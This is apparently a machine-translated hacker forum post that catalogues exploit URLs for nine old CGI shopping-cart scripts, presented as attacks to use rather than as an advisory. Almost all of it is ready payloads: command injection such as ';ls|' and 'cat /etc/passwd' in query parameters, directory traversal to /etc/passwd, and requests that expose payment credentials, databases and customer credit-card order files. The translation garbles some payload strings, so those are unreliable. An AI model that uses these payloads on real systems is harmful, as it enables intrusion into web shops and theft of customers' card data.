We continue our study of bugs of popular shopping trolleys in the recent past.
This time we at the beginning will examine the carts that allowed to perform arbitrary commands, and afterwards and other goodies.
№ 1-m we will go (e) shop Online-Shop System from Webdiscount.net
The script does not filter the symbols of the pipeline (;) and paypape (|):
Www.xxx.com/cgi-bin/eshop.pl? Seite =; ls |
No. 2 Hassan Consulting's Shoping cart [shop.cgi] from Hassan Consulting.
same:
Www.xxx.com/cgi-local/shop.pl/page= | ls |
Www.xxx.com/cgi-local/shop.pl/page=; ls |
Unfortunately, in versions 4 and above of Hassan Consulting's Shoping cart, this bug is already missing, but there is another problem when you request www.xxx.com/cgi-local/shop.pl you can find out the version of the shopping cart and the path to the script.
№ 3 ShopPlus Cart
The same, there is no check for the input characters:
Www.xxx.com/scripts/shopplus.cgi? Dn = domainname.com & cartid =% CARTID% & file =; uid |
Www.xxx.com/scripts/shopplus.cgi? Dn = domainname.com & cartid =% CARTID% & file =; cat% 20 / etc / passwd |
№ 4 multi-shop 1.06
Instead of a template file, you can specify any command.
Www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf & user_notebooks = note_envoy
No. 5 WebCart by Mountain Network Systems
We execute remote commands:
Www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD
Next, we look at other vulnerabilities
№ 6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities
Adding specific variables and values to the end of http: //target/cgi-bin/cart.pl?
Will allow remote users to perform some actions.
"Vars" displays the parameters
Settings of the application configuration that includes the user name and password used
For credit card transactions.
Environment settings can be obtained,
Using "env".
The string "db" will list the complete database file containing all the items in the shopping cart.
Www.xxx.com/cgi-bin/cart.pl?vars
Www.xxx.com/cgi-bin/cart.pl?env
Www.xxx.com/cgi-bin/cart.pl?db
№ 7 ShopCartCGI v 2.3
A flaw allows a remote user to view files on the server:
Www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../ .. /../../../../etc/passwd
Www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../. ./../../../../etc/passwd
№ 8 QuikStore Shopping Cart
A remote user can view files on the system:
Www.xxx.com/quikstore.cgi?blah&template=../../.
./../../../../../../../etc/passwd%00.html
Www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/ Hosts
Www.xxx.com/quikstore.cgi?blah&t emplate = .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / usr / Bin / id |
№ 9 DCShop Electronic Shopping Cart
A whole bunch of bugs:
Www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - information on credit cards in old versions of the cart was viewed like this.
Www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - gives out information about credit cards in some new versions.
Your bug Durito.
_________________
EAT THE RICH!
|
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.